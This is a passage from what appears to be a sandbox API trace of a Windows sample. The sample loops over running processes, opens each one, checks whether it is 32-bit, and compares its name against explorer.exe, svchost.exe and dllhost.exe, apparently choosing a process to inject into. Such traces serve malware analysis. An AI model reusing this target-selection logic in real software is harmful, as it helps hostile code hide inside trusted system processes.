(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0186.633] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.633] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.633] CloseHandle (hObject=0xec) returned 1 [0186.633] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0186.633] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0186.633] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0186.633] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0186.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0186.634] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.634] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.634] CloseHandle (hObject=0xec) returned 1 [0186.634] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0186.634] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0186.634] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0186.634] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0186.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0186.635] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.635] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.635] CloseHandle (hObject=0xec) returned 1 [0186.635] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0186.635] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0186.635] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0186.635] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0186.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0186.635] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.635] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.635] CloseHandle (hObject=0xec) returned 1 [0186.635] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0186.635] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0186.635] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0186.635] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0186.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0186.636] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.636] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.636] CloseHandle (hObject=0xec) returned 1 [0186.636] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0186.636] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0186.636] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0186.636] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0186.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0186.637] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.637] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.637] CloseHandle (hObject=0xec) returned 1 [0186.637] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0186.637] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0186.637] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0186.637] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0186.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0186.638] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.638] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.638] CloseHandle (hObject=0xec) returned 1 [0186.638] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0186.638] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0186.638] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0186.638] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0186.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0186.638] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.638] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.639] CloseHandle (hObject=0xec) returned 1 [0186.639] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0186.639] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0186.639] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0186.639] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0186.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0186.639] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.639] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.639] CloseHandle (hObject=0xec) returned 1 [0186.639] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0186.639] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0186.640] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0186.640] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0186.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0186.640] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.640] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.640] CloseHandle (hObject=0xec) returned 1 [0186.640] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0186.640] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0186.640] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0186.640] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0186.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0186.641] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.641] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.641] CloseHandle (hObject=0xec) returned 1 [0186.641] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0186.641] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0186.641] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0186.641] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0186.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0186.642] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.642] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.642] CloseHandle (hObject=0xec) returned 1 [0186.642] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0186.642] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0186.642] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0186.642] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0186.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0186.643] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.643] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.643] CloseHandle (hObject=0xec) returned 1 [0186.643] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0186.643] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0186.643] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0186.643] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0186.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0186.644] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.644] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.644] CloseHandle (hObject=0xec) returned 1 [0186.644] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0186.644] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0186.644] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0186.644] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0186.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0186.644] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.644] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.644] CloseHandle (hObject=0xec) returned 1 [0186.645] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0186.645] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0186.645] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0186.645] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0186.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0186.645] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.645] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.645] CloseHandle (hObject=0xec) returned 1 [0186.645] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0186.645] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0186.645] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0186.645] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0186.646] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0186.646] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0186.647] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0186.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0186.648] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.648] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0186.648] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0186.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0186.649] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0186.649] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0186.650] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.650] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.650] CloseHandle (hObject=0xec) returned 1 [0186.650] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0186.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0186.650] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.651] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.651] CloseHandle (hObject=0xec) returned 1 [0186.651] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0186.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0186.651] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.652] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0186.652] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.652] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.652] CloseHandle (hObject=0xec) returned 1 [0186.652] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0186.652] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.652] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0186.652] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.652] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.652] CloseHandle (hObject=0xec) returned 1 [0186.652] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.653] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0186.653] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.653] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.653] CloseHandle (hObject=0xec) returned 1 [0186.653] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0186.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0186.654] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.654] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0186.654] CloseHandle (hObject=0xec) returned 1 [0186.654] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0186.654] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0186.654] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0186.654] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0186.655] CloseHandle (hObject=0xe8) returned 1 [0186.655] Sleep (dwMilliseconds=0x3e8) [0187.661] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0187.663] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0187.664] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0187.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0187.664] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0187.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0187.665] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0187.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0187.665] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0187.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0187.666] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0187.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0187.666] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0187.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0187.667] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0187.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0187.667] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0187.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0187.668] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, 